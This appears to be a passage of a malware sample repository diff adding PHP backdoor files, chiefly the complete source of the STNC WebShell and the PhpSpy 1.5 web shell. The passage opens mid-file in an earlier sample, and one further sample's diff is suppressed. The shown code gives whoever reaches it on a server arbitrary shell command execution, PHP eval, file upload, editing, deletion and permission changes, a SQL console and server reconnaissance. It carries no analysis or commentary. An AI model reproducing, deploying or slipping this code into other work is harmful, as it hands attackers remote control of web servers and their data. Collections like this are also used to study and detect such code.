<tr><td $hsplit><table><tr><td $vsplit><b>&nbsp;&nbsp;STNC&nbsp;WebShell&nbsp;v$version&nbsp;&nbsp;</b></td><td>id: ".id()."<br>uname: ".uname()."<br>your ip: ".$_SERVER["REMOTE_ADDR"]." - server ip: ".gethostbyname($_SERVER["HTTP_HOST"])." - safe_mode: ".((safe_mode_is_on()) ? "on" : "off")."</td></tr></table></tr></td>
<tr><form method=post><td class=\"pad\" colspan=2 $hsplit><center>".hidden("action","save").hidden_pwd()."<textarea cols=120 rows=16 wrap=off name=data>";
echo htmlspecialchars($printline)."\n";
if($action === "cmd")
{
if(isset($_POST["cmd"]))
$cmd = $_POST["cmd"];
else
$cmd = "ls -la";
$result = htmlspecialchars(cmd($cmd));
if($result === "")
$result = cmd("ls -la");
echo $result;
$location = getcwd();
}
elseif(($action === "edit")&&(isset($_POST["fname"])))
{
$fname = $_POST["fname"];
ob_start();
if(!readfile($fname))
echo "Cann't open file \"$fname\".";
else
$action_edit = true;
$result = ob_get_clean();
ob_end_clean();
echo htmlspecialchars($result);
}
elseif(($action === "save")&&(isset($_POST["fname"]))&&(isset($_POST["data"])))
{
$fname = $_POST["fname"];
$data = $_POST["data"];
$fid = fopen($fname, "w");
$fname = htmlspecialchars($fname);
if(!$fid)
echo "Cann't save file \"$fname\".";
else
{
fputs($fid, $data);
fclose($fid);
echo "File \"$fname\" is saved.";
}
}
elseif(($action === "upload")&&(isset($_FILES["file"]))&&(isset($_POST["fname"])))
{
$fname = $_POST["fname"];
if(copy($_FILES["file"]["tmp_name"], $fname))
echo "File \"$fname\" is uploaded.\nFile size: ".filesize($fname)." bytes.";
else
echo "Upload failed!";
}
elseif(($action === "eval")&&(isset($_POST["code"])))
{
$code = $_POST["code"];
ob_start();
eval($code);
$result = ob_get_clean();
ob_end_clean();
echo htmlspecialchars($result);
}
echo "</textarea>".(($action_edit) ? "<br>".button(" Save ").hidden("fname",$fname):"")."</center></td></form></tr>
<tr><form method=post><td class=\"pad\" $hsplit><center>".hidden("action","cmd")."<table><tr><td width=80>Command:&nbsp;</td><td>".edit(85,"cmd","")."</td></tr><tr><td>Location:&nbsp;</td><td>".edit(85,"pwd",$location)."&nbsp;".button("Execute")."</td></tr></table></center></td></form></tr>
<tr><form method=post><td class=\"pad\" $hsplit><center>".hidden("action","edit").hidden_pwd()."<table><tr><td width=80>Edit file:</td><td>".edit(85,"fname",$location)."</td><td>".button(" Edit ")."</td></table></center></td></form></tr>
<tr><form method=post><td class=\"pad\" $hsplit><table width=100%><tr><td width=50% $vsplit>".
hidden("action","download").hidden_pwd()."<center><table><tr><td width=80>File:</td><td>".edit(50,"fname",$location)."</td><td>".button("Download")."</td></tr></table></center>
</td></form><form method=post enctype=multipart/form-data><td class=\"pad\" width=50%>".
hidden("action","upload").hidden_pwd()."<center><table><tr><td width=80>File:</td><td><input type=file size=50 name=file></td></tr><tr><td>To file:</td><td>".edit(50,"fname",$location)."&nbsp;".button("Upload")."</td></tr></table></center>
</td></tr></table></td></form></tr>
<tr><form method=post><td class=\"pad\" $hsplit>".hidden("action","eval").hidden_pwd()."<center><textarea cols=100 rows=4 wrap=off name=code></textarea><br>".button(" Eval ")."</center></td></form></tr>
<tr><td align=right>Coded by drmist | <a href=\"http://drmist.ru\">http://drmist.ru</a> | <a href=\"http://www.security-teams.net\">http://www.security-teams.net</a> | <a href=\"http://www.security-teams.net/index.php?showtopic=3429\">not enough functions?</a> | (c) 2006 [STNC]</td></tr></table></body>";
?>

168
PHP/Backdoor.PHP.Stnc.b Normal file
View File

@ -0,0 +1,168 @@
<?php
$version = "0.8";
$vsplit = "style=\"border-right: #000000 1px solid;\"";
$hsplit = "style=\"border-bottom: #000000 1px solid;\"";
error_reporting(0);
if(version_compare(phpversion(),"4.1.0") == -1)
{ $_POST=&$HTTP_POST_VARS; }
if(get_magic_quotes_gpc())
foreach ($_POST as $k=>$v)
{ $_POST[$k] = stripslashes($v); }
/*
$login='root';
$hash='b1b3773a05c0ed0176787a4f1574ff0075f7521e'; // sha1("qwerty")
if(!(($_SERVER["PHP_AUTH_USER"]===$login)&&(sha1($_SERVER["PHP_AUTH_PW"])===$hash)))
{
header("HTTP/1.0 401 Unauthorized");
header("WWW-Authenticate: Basic");
die();
}
*/
function fe($s)
{return function_exists($s);}
function cmd($s)
{if(fe("exec")){exec($s,$r);$r=join("\n",$r);}
elseif(fe("shell_exec"))$r=shell_exec($s);
elseif(fe("system")){ob_start();system($s);$r=ob_get_contents();ob_end_clean();}
elseif(fe("passthru")){ob_start();passthru($s);$r=ob_get_contents();ob_end_clean();}
elseif(is_resource($f=popen($s,"r"))){$r="";while(!feof($f))$r.=fread($f,512);pclose($f);}
else $r=`$s`;return $r;}
function safe_mode_is_on()
{return ini_get('safe_mode');}
function str100($s)
{if(strlen($s)>100) $s=substr($s,0,100)."..."; return $s;}
function id()
{return str100(cmd("id"));}
function uname()
{return str100(cmd("uname -a"));}
function edit($size, $name, $val)
{ return "<input type=text size=$size name=$name value=\"$val\">"; }
function button($capt)
{ return "<input class=\"btn\" type=submit value=\"$capt\">"; }
function hidden($name, $val)
{ return "<input type=hidden name=$name value=\"$val\">"; }
function hidden_pwd()
{ global $location; return hidden("pwd",$location);}
$action_edit = false;
$printline = "";
if(isset($_POST["action"])) $action = $_POST["action"];
else $action = "cmd";
if(isset($_POST["pwd"]))
{ $pwd = $_POST["pwd"]; $type = filetype($pwd); if($type === "dir")chdir($pwd); else $printline = "\"$pwd\" - no such directory."; }
$location = getcwd();
if(($action === "download")&&(isset($_POST["fname"])))
{
$fname = $_POST["fname"];
if(file_exists($fname))
{
$pathinfo = pathinfo($fname);
header("Content-Transfer-Encoding: binary");
header("Content-type: application/x-download");
header("Content-Length: ".filesize($fname));
header("Content-Disposition: attachment; filename=".$pathinfo["basename"]);
readfile($fname);
die();
}
else
$printline = "\"$fname\" - download failed.";
}
echo "<head><style>input {border: black 1px solid; background-color: #dfdfdf; font: 8pt verdana;}
textarea {background-color:#dfdfdf; scrollbar-face-color: #dfdfdf; scrollbar-highlight-color: #dfdfdf;
scrollbar-shadow-color: #dfdfdf; scrollbar-3dlight-color: #dfdfdf; scrollbar-arrow-color: #dfdfdf; scrollbar-track-color: #dfdfdf;
scrollbar-darkshadow-color: #dfdfdf; border: black 1px solid; font: fixedsys bold; }
td {padding:0;} body {margin: 0; padding: 0; background-color: #cfcfcf;} a {color:black;text-decoration:none;}
.btn {background-color: #cfcfcf;} .pad {padding:5;}
</style><title> STNC WebShell v$version </title></head><body><table width=100%>
<tr><td $hsplit><table><tr><td $vsplit><b>&nbsp;&nbsp;STNC&nbsp;WebShell&nbsp;v$version&nbsp;&nbsp;</b></td><td>id: ".id()."<br>uname: ".uname()."<br>your ip: ".$_SERVER["REMOTE_ADDR"]." - server ip: ".gethostbyname($_SERVER["HTTP_HOST"])." - safe_mode: ".((safe_mode_is_on()) ? "on" : "off")."</td></tr></table></tr></td>
<tr><form method=post><td class=\"pad\" colspan=2 $hsplit><center>".hidden("action","save").hidden_pwd()."<textarea cols=120 rows=16 wrap=off name=data>";
echo htmlspecialchars($printline)."\n";
if($action === "cmd")
{
if(isset($_POST["cmd"]))
$cmd = $_POST["cmd"];
else
$cmd = "ls -la";
$result = htmlspecialchars(cmd($cmd));
if($result === "")
$result = cmd("ls -la");
echo $result;
$location = getcwd();
}
elseif(($action === "edit")&&(isset($_POST["fname"])))
{
$fname = $_POST["fname"];
ob_start();
if(!readfile($fname))
echo "Cann't open file \"$fname\".";
else
$action_edit = true;
$result = ob_get_clean();
ob_end_clean();
echo htmlspecialchars($result);
}
elseif(($action === "save")&&(isset($_POST["fname"]))&&(isset($_POST["data"])))
{
$fname = $_POST["fname"];
$data = $_POST["data"];
$fid = fopen($fname, "w");
$fname = htmlspecialchars($fname);
if(!$fid)
echo "Cann't save file \"$fname\".";
else
{
fputs($fid, $data);
fclose($fid);
echo "File \"$fname\" is saved.";
}
}
elseif(($action === "upload")&&(isset($_FILES["file"]))&&(isset($_POST["fname"])))
{
$fname = $_POST["fname"];
if(copy($_FILES["file"]["tmp_name"], $fname))
echo "File \"$fname\" is uploaded.\nFile size: ".filesize($fname)." bytes.";
else
echo "Upload failed!";
}
elseif(($action === "eval")&&(isset($_POST["code"])))
{
$code = $_POST["code"];
ob_start();
eval($code);
$result = ob_get_clean();
ob_end_clean();
echo htmlspecialchars($result);
}
echo "</textarea>".(($action_edit) ? "<br>".button(" Save ").hidden("fname",$fname):"")."</center></td></form></tr>
<tr><form method=post><td class=\"pad\" $hsplit><center>".hidden("action","cmd")."<table><tr><td width=80>Command:&nbsp;</td><td>".edit(85,"cmd","")."</td></tr><tr><td>Location:&nbsp;</td><td>".edit(85,"pwd",$location)."&nbsp;".button("Execute")."</td></tr></table></center></td></form></tr>
<tr><form method=post><td class=\"pad\" $hsplit><center>".hidden("action","edit").hidden_pwd()."<table><tr><td width=80>Edit file:</td><td>".edit(85,"fname",$location)."</td><td>".button(" Edit ")."</td></table></center></td></form></tr>
<tr><form method=post><td class=\"pad\" $hsplit><table width=100%><tr><td width=50% $vsplit>".
hidden("action","download").hidden_pwd()."<center><table><tr><td width=80>File:</td><td>".edit(50,"fname",$location)."</td><td>".button("Download")."</td></tr></table></center>
</td></form><form method=post enctype=multipart/form-data><td class=\"pad\" width=50%>".
hidden("action","upload").hidden_pwd()."<center><table><tr><td width=80>File:</td><td><input type=file size=50 name=file></td></tr><tr><td>To file:</td><td>".edit(50,"fname",$location)."&nbsp;".button("Upload")."</td></tr></table></center>
</td></tr></table></td></form></tr>
<tr><form method=post><td class=\"pad\" $hsplit>".hidden("action","eval").hidden_pwd()."<center><textarea cols=100 rows=4 wrap=off name=code></textarea><br>".button(" Eval ")."</center></td></form></tr>
<tr><td align=right>Coded by drmist | <a href=\"http://drmist.ru\">http://drmist.ru</a> | <a href=\"http://www.security-teams.net\">http://www.security-teams.net</a> | <a href=\"http://www.security-teams.net/index.php?showtopic=3429\">not enough functions?</a> | (c) 2006 [STNC]</td></tr></table></body>";
?>

1840
PHP/Backdoor.PHP.TDshell.a Normal file
View File

File diff suppressed because it is too large Load Diff

810
PHP/Backdoor.PHP.WebShell.a Normal file
View File

@ -0,0 +1,810 @@
<?php
/*
+--------------------------------------------------------------------------+
| PhpSpy Version:1.5 |
| Codz by Angel |
| (c) 2004 Security Angel Team |
| http://www.4ngel.net |
| ======================================================================== |
| Team: http://www.4ngel.net |
| http://www.bugkidz.org |
| Email: 4ngel@21cn.com |
| Date: July 22st(My mother's birthday), 2004 |
+--------------------------------------------------------------------------+
*/
error_reporting(7);
ob_start();
$mtime = explode(' ', microtime());
$starttime = $mtime[1] + $mtime[0];
/*===================== 程序配置 =====================*/
// 是否需要密码验证,1为需要验证,其他数字为直接进入.下面选项则无效
$admin['check']="1";
// 验证方式,1为采用 Session 验证,其他数字则采用 Cookie验证
// 默认采用 Session 验证,如果不能正常登陆,建议改为 Cookie验证
$admin['checkmode']="1";
// 如果需要密码验证,请修改登陆密码
$admin['pass']="hkuser";
/*===================== 配置结束 =====================*/
// 允许程序在 register_globals = off 的环境下工作
if ( function_exists('ini_get') ) {
$onoff = ini_get('register_globals');
} else {
$onoff = get_cfg_var('register_globals');
}
if ($onoff != 1) {
@extract($_POST, EXTR_SKIP);
@extract($_GET, EXTR_SKIP);
}
/*===================== 身份验证 =====================*/
if($admin['check']=="1") {
if($admin['checkmode']=="1") {
/*------- session 验证 -------*/
session_start();
if ($_GET['action'] == "logout") {
session_destroy();
echo "<meta http-equiv=\"refresh\" content=\"3;URL=".$_SERVER['PHP_SELF']."\">";
echo "<span style=\"font-size: 12px; font-family: Verdana\">注销成功......<p><a href=\"".$_SERVER['PHP_SELF']."\">三秒后自动退出或单击这里退出程序界面&gt;&gt;&gt;</a></span>";
exit;
}
if ($_POST['action'] == "login") {
$adminpass=trim($_POST['adminpass']);
if ($adminpass==$admin['pass']) {
$_SESSION['adminpass'] = $admin['pass'];
echo "<meta http-equiv=\"refresh\" content=\"3;URL=".$_SERVER['PHP_SELF']."\">";
echo "<span style=\"font-size: 12px; font-family: Verdana\">登陆成功......<p><a href=\"".$_SERVER['PHP_SELF']."\">三秒后自动跳转或单击这里进入程序界面&gt;&gt;&gt;</a></span>";
exit;
}
}
if (session_is_registered('adminpass')) {
if ($_SESSION['adminpass']!=$admin['pass']) {
loginpage();
}
} else {
loginpage();
}
} else {
/*------- cookie 验证 -------*/
if ($_GET['action'] == "logout") {
setcookie ("adminpass", "");
echo "<meta http-equiv=\"refresh\" content=\"3;URL=".$_SERVER['PHP_SELF']."\">";
echo "<span style=\"font-size: 12px; font-family: Verdana\">注销成功......<p><a href=\"".$_SERVER['PHP_SELF']."\">三秒后自动退出或单击这里退出程序界面&gt;&gt;&gt;</a></span>";
exit;
}
if ($_POST['action'] == "login") {
$adminpass=trim($_POST['adminpass']);
if ($adminpass==$admin['pass']) {
setcookie ("adminpass",$admin['pass'],time()+(1*24*3600));
echo "<meta http-equiv=\"refresh\" content=\"3;URL=".$_SERVER['PHP_SELF']."\">";
echo "<span style=\"font-size: 12px; font-family: Verdana\">登陆成功......<p><a href=\"".$_SERVER['PHP_SELF']."\">三秒后自动跳转或单击这里进入程序界面&gt;&gt;&gt;</a></span>";
exit;
}
}
if (isset($_COOKIE['adminpass'])) {
if ($_COOKIE['adminpass']!=$admin['pass']) {
loginpage();
}
} else {
loginpage();
}
}
}//end check
/*===================== 验证结束 =====================*/
// 判断 magic_quotes_gpc 状态
if (get_magic_quotes_gpc()) {
$_GET = stripslashes_array($_GET);
$_POST = stripslashes_array($_POST);
}
// 下载文件
if (!empty($downfile)) {
if (!@file_exists($downfile)) {
echo "<script>alert('你要下的文件不存在!')</script>";
} else {
$filename = basename($downfile);
$filename_info = explode('.', $filename);
$fileext = $filename_info[count($filename_info)-1];
header('Content-type: application/x-'.$fileext);
header('Content-Disposition: attachment; filename='.$filename);
header('Content-Description: PHP3 Generated Data');
@readfile($downfile);
exit;
}
}
// 程序目录(文件系统)
$pathname=str_replace('\\','/',dirname(__FILE__));
// 获取当前路径
if (!isset($dir) or empty($dir)) {
$dir = ".";
$nowpath = getPath($pathname, $dir);
} else {
$dir=$_GET['dir'];
$nowpath = getPath($pathname, $dir);
}
// 判断读写情况
if (dir_writeable($nowpath)) {
$dir_writeable = "可写";
} else {
$dir_writeable = "不可写";
}
$dis_func = get_cfg_var("disable_functions");
$phpinfo=(!eregi("phpinfo",$dis_func)) ? " | <a href=\"?action=phpinfo\">PHPINFO</a>" : "";
$shellmode=(!get_cfg_var("safe_mode")) ? " | <a href=\"?action=shell\">WebShell模式</a>" : "";
?>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>PhpSpy Ver 1.5</title>
<style type="text/css">
.maintable {
background-color: "#FFFFFF";
border: "1px solid #115173";
}
body,td {
font-family: "sans-serif";
font-size: "12px";
line-height: "150%";
}
.INPUT {
FONT-SIZE: "12px";
COLOR: "#000000";
BACKGROUND-COLOR: "#FFFFFF";
height: "18px";
border: "1px solid #666666";
}
a:link,
a:visited,
a:active{
color: "#000000";
text-decoration: underline;
}
a:hover{
color: "#465584";
text-decoration: none;
}
.firstalt {BACKGROUND-COLOR: "#EFEFEF"}
.secondalt {BACKGROUND-COLOR: "#F5F5F5"}
</style>
</head>
<body style="table-layout:fixed; word-break:break-all">
<center>
<p><strong><a href="?action=logout">注销会话</a> | <a href="?action=dir">返回根目录</a> | <a href="?action=phpenv">PHP环境变量</a><?=$phpinfo?><?=$shellmode?> | <a href="?action=sql">SQL查询</a> | <a href="http://www.4ngel.net" target="_blank" title="下载此程序">Version 1.5</a></strong></p>
<?php
if ($_GET['action'] == "phpinfo") {
$dis_func = get_cfg_var("disable_functions");
echo $phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "phpinfo() 函数已被禁用,请查看&lt;PHP环境变量&gt;";
exit;
}
?>
<table width="760" border="0" cellpadding="0">
<form action="" method="GET">
<tr>
<td><p>程序路径:<?=$pathname?><br>当前目录(<?=$dir_writeable?>,<?=substr(base_convert(@fileperms($nowpath),10,8),-4);?>):<?=$nowpath?>
<br>跳转目录:
<input name="dir" type="text" class="INPUT">
<input type="submit" class="INPUT" value="确定"> 〖支持绝对路径和相对路径〗
</p></td>
</tr>
</form>
<form action="?dir=<?=urlencode($dir)?>" method="POST" enctype="multipart/form-data">
<tr>
<td colspan="2">上传文件到当前目录:
<input name="uploadmyfile" type="file" class="INPUT"> <input type="submit" class="INPUT" value="确定">
<input name="action" type="hidden" value="uploadfile"><input type="hidden" name="uploaddir" value="<?=$dir?>"></td>
</tr>
</form>
<form action="?action=editfile&dir=<?=urlencode($dir)?>" method="POST">
<tr>
<td colspan="2">新建文件在当前目录:
<input name="newfile" type="text" class="INPUT" value="">
<input type="submit" class="INPUT" value="确定">
<input name="action" type="hidden" value="createfile"></td>
</tr>
</form>
<form action="" method="POST">
<tr>
<td colspan="2">新建目录在当前目录:
<input name="newdirectory" type="text" class="INPUT" value="">
<input type="submit" class="INPUT" value="确定">
<input name="action" type="hidden" value="createdirectory"></td>
</tr>
</form>
</table>
<hr width="760" noshade>
<?php
/*===================== 执行操作 开始 =====================*/
echo "<p><b>\n";
// 删除文件
if(@$delfile!="") {
if(file_exists($delfile)) {
@unlink($delfile);
echo "".$delfile." 删除成功!";
} else {
echo "文件已不存在,删除失败!";
}
}
// 删除目录
elseif($_POST['action'] == "rmdir") {
if($deldir!="") {
$deldirs="$dir/$deldir";
if(!file_exists("$deldirs")) {
echo "目录已不存在!";
} else {
deltree($deldirs);
}
} else {
echo "删除失败!";
}
}
// 创建目录
elseif($_POST['action'] == "createdirectory") {
if(!empty($newdirectory)) {
$mkdirs="$dir/$newdirectory";
if(file_exists("$mkdirs")) {
echo "该目录已存在!";
} else {
echo $msg=@mkdir("$mkdirs",0777) ? "创建目录成功!" : "创建失败!";
@chmod("$mkdirs",0777);
}
}
}
// 上传文件
elseif($_POST['action'] == "uploadfile") {
echo $msg=@copy($_FILES['uploadmyfile']['tmp_name'],"".$uploaddir."/".$_FILES['uploadmyfile']['name']."") ? "上传成功!" : "上传失败!";
}
// 编辑文件
elseif($_POST['action'] == "doeditfile") {
$filename="$dir/$editfilename";
@$fp=fopen("$filename","w");
echo $msg=@fwrite($fp,$_POST['filecontent']) ? "写入文件成功!" : "写入失败!";
@fclose($fp);
}
// 编辑文件属性
elseif($_POST['action'] == "editfileperm") {
$fileperm=base_convert($_POST['fileperm'],8,10);
echo $msg=@chmod($dir."/".$file,$fileperm) ? "属性修改成功!" : "修改失败!";
echo " [".$file."] 修改后的属性为:".substr(base_convert(@fileperms($dir."/".$file),10,8),-4)."";
}
// 连接MYSQL
elseif($connect) {
if (@mysql_connect($servername,$dbusername,$dbpassword) AND @mysql_select_db($dbname)) {
echo "数据库连接成功!";
} else {
echo mysql_error();
}
}
// 执行SQL语句
elseif($doquery) {
@mysql_connect($servername,$dbusername,$dbpassword) or die("数据库连接失败");
@mysql_select_db($dbname) or die("选择数据库失败");
$result = @mysql_query($_POST['sql_query']);
if ($result) {
echo "SQL语句成功执行";
}else{
echo "出错: ".mysql_error();
}
mysql_close();
}
// 查看PHP配置参数状况
elseif($_POST['action'] == "viewphpvar") {
echo "配置参数 ".$_POST['phpvarname']." 检测结果: ".getphpcfg($_POST['phpvarname'])."";
}
else {
echo "本程序由 Security Angel 安全组织 angel[BST] 独立开发,可在 <a href=\"http://www.4ngel.net\" target=\"_blank\">http://www.4ngel.net</a> 下载最新版本.";
}
echo "</b></p>\n";
/*===================== 执行操作 结束 =====================*/
if (!isset($_GET['action']) OR empty($_GET['action']) OR ($_GET['action'] == "dir")) {
?>
<table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
<tr bgcolor="#cccccc">
<td align="center" nowrap width="40%"><b>文件</b></td>
<td align="center" nowrap width="20%"><b>修改日期</b></td>
<td align="center" nowrap width="12%"><b>大小</b></td>
<td align="center" nowrap width="8%"><b>属性</b></td>
<td align="center" nowrap width="20%"><b>操作</b></td>
</tr>
<?php
// 目录列表
$dirs=@opendir($dir);
while ($file=@readdir($dirs)) {
$b="$dir/$file";
$a=@is_dir($b);
if($a=="1"){
if($file!=".."&&$file!=".") {
$lastsave=@date("Y-n-d H:i:s",filemtime("$dir/$file"));
$dirperm=substr(base_convert(fileperms("$dir/$file"),10,8),-4);
echo "<tr class=".getrowbg().">\n";
echo " <td style=\"padding-left: 5px;\">[<a href=\"?dir=".urlencode($dir)."/".urlencode($file)."\"><font color=\"#006699\">$file</font></a>]</td>\n";
echo " <td align=\"center\" nowrap valign=\"top\">$lastsave</td>\n";
echo " <td align=\"center\" nowrap valign=\"top\">&lt;dir&gt;</td>\n";
echo " <td align=\"center\" nowrap valign=\"top\"><a href=\"?action=fileperm&dir=".urlencode($dir)."&file=".urlencode($file)."\">$dirperm</a></td>\n";
echo " <td align=\"center\" nowrap valign=\"top\"><a href=\"?action=deldir&dir=".urlencode($dir)."&deldir=".urlencode($file)."\">删除</a></td>\n";
echo "</tr>\n";
} else {
if($file=="..") {
echo "<tr class=".getrowbg().">\n";
echo " <td nowrap colspan=\"5\" style=\"padding-left: 5px;\"><a href=\"?dir=".$dir."/".$file."\">返回上级目录</a></td>\n";
echo "</tr>\n";
}
}
$dir_i++;
}
}//while
@closedir($dirs);
// 文件列表
$dirs=@opendir($dir);
while ($file=@readdir($dirs)) {
$b="$dir/$file";
$a=@is_dir($b);
if($a=="0"){
$size=@filesize("$dir/$file");
$size=$size/1024 ;
$size= @number_format($size, 3);
$lastsave=@date("Y-n-d H:i:s",filectime("$dir/$file"));
@$fileperm=substr(base_convert(fileperms("$dir/$file"),10,8),-4);
echo "<tr class=".getrowbg().">\n";
echo " <td style=\"padding-left: 5px;\"><a href=\"$dir/$file\" target=\"_blank\">$file</a></td>\n";
echo " <td align=\"center\" nowrap valign=\"top\">$lastsave</td>\n";
echo " <td align=\"center\" nowrap valign=\"top\">$size KB</td>\n";
echo " <td align=\"center\" nowrap valign=\"top\"><a href=\"?action=fileperm&dir=".urlencode($dir)."&file=".urlencode($file)."\">$fileperm</a></td>\n";
echo " <td align=\"center\" nowrap valign=\"top\"><a href=\"?downfile=".urlencode($dir)."/".urlencode($file)."\">下载</a> | <a href=\"?action=editfile&dir=".urlencode($dir)."&editfile=".urlencode($file)."\">编辑</a> | <a href=\"?dir=".urlencode($dir)."&delfile=".urlencode($dir)."/".urlencode($file)."\">删除</a></td>\n";
echo "</tr>\n";
$file_i++;
}
}
@closedir($dirs);
echo "<tr class=".getrowbg().">\n";
echo " <td nowrap colspan=\"5\" align=\"right\">".$dir_i." 个目录<br>".$file_i." 个文件</td>\n";
echo "</tr>\n";
?>
</table>
<?php
}// end dir
elseif ($_GET['action'] == "editfile") {
if($newfile=="") {
$filename="$dir/$editfile";
$fp=@fopen($filename,"r");
$contents=@fread($fp, filesize($filename));
@fclose($fp);
$contents=htmlspecialchars($contents);
}else{
$editfile=$newfile;
$filename = "$dir/$editfile";
}
?>
<table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
<tr class="firstalt">
<td align="center">新建/编辑文件 [<a href="?dir=<?=urlencode($dir)?>">返回</a>]</td>
</tr>
<form action="?dir=<?=urlencode($dir)?>" method="POST">
<tr class="secondalt">
<td align="center">当前文件:<input class="input" type="text" name="editfilename" size="30"
value="<?=$editfile?>"> 输入新文件名则建立新文件</td>
</tr>
<tr class="firstalt">
<td align="center"><textarea name="filecontent" cols="100" rows="20"><?=$contents?></textarea></td>
</tr>
<tr class="secondalt">
<td align="center"><input type="submit" value="确定写入" class="input">
<input name="action" type="hidden" value="doeditfile">
<input type="reset" value="重置" class="input"></td>
</tr>
</form>
</table>
<?php
}//end editfile
elseif ($_GET['action'] == "shell") {
if (!get_cfg_var("safe_mode")) {
?>
<table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
<tr class="firstalt">
<td align="center">WebShell Mode</td>
</tr>
<form action="?action=shell&dir=<?=urlencode($dir)?>" method="POST">
<tr class="secondalt">
<td align="center">提示:如果输出结果不完全,建议把输出结果写入文件.这样可以得到全部内容.</td>
</tr>
<tr class="firstalt">
<td align="center">
选择执行函数:
<select name="execfunc" class="input">
<option value="system" <? if ($execfunc=="system") { echo "selected"; } ?>>system</option>
<option value="passthru" <? if ($execfunc=="passthru") { echo "selected"; } ?>>passthru</option>
<option value="exec" <? if ($execfunc=="exec") { echo "selected"; } ?>>exec</option>
<option value="shell_exec" <? if ($execfunc=="shell_exec") { echo "selected"; } ?>>shell_exec</option>
<option value="popen" <? if ($execfunc=="popen") { echo "selected"; } ?>>popen</option>
</select> 
输入命令:
<input type="text" name="command" size="60" value="<?=$_POST['command']?>" class="input">
<input type="submit" value="execute" class="input"></td>
</tr>
<tr class="secondalt">
<td align="center"><textarea name="textarea" cols="100" rows="25" readonly><?php
if (!empty($_POST['command'])) {
if ($execfunc=="system") {
system($_POST['command']);
} elseif ($execfunc=="passthru") {
passthru($_POST['command']);
} elseif ($execfunc=="exec") {
$result = exec($_POST['command']);
echo $result;
} elseif ($execfunc=="shell_exec") {
$result=shell_exec($_POST['command']);
echo $result;
} elseif ($execfunc=="popen") {
$pp = popen($_POST['command'], 'r');
$read = fread($pp, 2096);
echo $read;
pclose($pp);
} else {
system($_POST['command']);
}
}
?></textarea></td>
</tr>
</form>
</table>
<?php
} else {
?>
<p><b>Safe_Mode 已打开, 无法执行系统命令.</b></p>
<?php
}
}//end shell
elseif ($_GET['action'] == "deldir") {
?>
<table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
<form action="?dir=<?=urlencode($dir)?>" method="POST">
<tr class="firstalt">
<td align="center">删除 <input name="deldir" type="text" value="<?=$deldir?>" class="input" readonly> 目录</td>
</tr>
<tr class="secondalt">
<td align="center">注意:如果该目录非空,此次操作将会删除该目录下的所有文件.您确定吗?</td>
</tr>
<tr class="firstalt">
<td align="center">
<input name="action" type="hidden" value="rmdir">
<input type="submit" value="delete" class="input">
</td>
</tr>
</form>
</table>
<?php
}//end deldir
elseif ($_GET['action'] == "fileperm") {
?>
<table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
<tr class="firstalt">
<td align="center">修改文件属性 [<a href="?dir=<?=urlencode($dir)?>">返回</a>]</td>
</tr>
<form action="?dir=<?=urlencode($dir)?>" method="POST">
<tr class="secondalt">
<td align="center"><input name="file" type="text" value="<?=$file?>" class="input" readonly> 的属性为:
<input type="text" name="fileperm" size="20" value="<?=substr(base_convert(fileperms($dir."/".$file),10,8),-4)?>" class="input">
<input name="dir" type="hidden" value="<?=urlencode($dir)?>">
<input name="action" type="hidden" value="editfileperm">
<input type="submit" value="modify" class="input"></td>
</tr>
</form>
</table>
<?php
}//end fileperm
elseif ($_GET['action'] == "sql") {
$servername = isset($servername) ? $servername : '127.0.0.1';
$dbusername = isset($dbusername) ? $dbusername : 'root';
$dbpassword = isset($dbpassword) ? $dbpassword : '';
$dbname = isset($dbname) ? $dbname : '';
?>
<table width="760" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
<tr class="firstalt">
<td align="center">执行 SQL 语句</td>
</tr>
<form action="?action=sql" method="POST">
<tr class="secondalt">
<td align="center">Host:
<input name="servername" type="text" class="INPUT" value="<?=$servername?>">
User:
<input name="dbusername" type="text" class="INPUT" size="15" value="<?=$dbusername?>">
Pass:
<input name="dbpassword" type="text" class="INPUT" size="15" value="<?=$dbpassword?>">
DB:
<input name="dbname" type="text" class="INPUT" size="15" value="<?=$dbname?>">
<input name="connect" type="submit" class="INPUT" value="连接"></td>
</tr>
<tr class="firstalt">
<td align="center"><textarea name="sql_query" cols="85" rows="10"></textarea></td>
</tr>
<tr class="secondalt">
<td align="center"><input type="submit" name="doquery" value="执行" class="input"></td>
</tr>
</form>
</table>
<?php
}//end sql query
elseif ($_GET['action'] == "phpenv") {
$upsize=get_cfg_var("file_uploads") ? get_cfg_var("upload_max_filesize") : "不允许上传";
$adminmail=(isset($_SERVER["SERVER_ADMIN"])) ? "<a href=\"mailto:".$_SERVER["SERVER_ADMIN"]."\">".$_SERVER["SERVER_ADMIN"]."</a>" : "<a href=\"mailto:".get_cfg_var("sendmail_from")."\">".get_cfg_var("sendmail_from")."</a>";
$dis_func = get_cfg_var("disable_functions");
if ($dis_func == "") {
$dis_func = "No";
}else {
$dis_func = str_replace(" ","<br>",$dis_func);
$dis_func = str_replace(",","<br>",$dis_func);
}
$phpinfo=(!eregi("phpinfo",$dis_func)) ? "Yes" : "No";
$info[0] = array("服务器时间",date("Y年m月d日 h:i:s",time()));
$info[1] = array("服务器域名","<a href=\"http://$_SERVER[SERVER_NAME]\" target=\"_blank\">$_SERVER[SERVER_NAME]</a>");
$info[2] = array("服务器IP地址",gethostbyname($_SERVER["SERVER_NAME"]));
$info[3] = array("服务器操作系统",PHP_OS);
$info[5] = array("服务器操作系统文字编码",$_SERVER["HTTP_ACCEPT_LANGUAGE"]);
$info[6] = array("服务器解译引擎",$_SERVER["SERVER_SOFTWARE"]);
$info[7] = array("Web服务端口",$_SERVER["SERVER_PORT"]);
$info[8] = array("PHP运行方式",strtoupper(php_sapi_name()));
$info[9] = array("PHP版本",PHP_VERSION);
$info[10] = array("运行于安全模式",getphpcfg("safemode"));
$info[11] = array("服务器管理员",$adminmail);
$info[12] = array("本文件路径",__FILE__);
$info[13] = array("允许使用 URL 打开文件 allow_url_fopen",getphpcfg("allow_url_fopen"));
$info[14] = array("允许动态加载链接库 enable_dl",getphpcfg("enable_dl"));
$info[15] = array("显示错误信息 display_errors",getphpcfg("display_errors"));
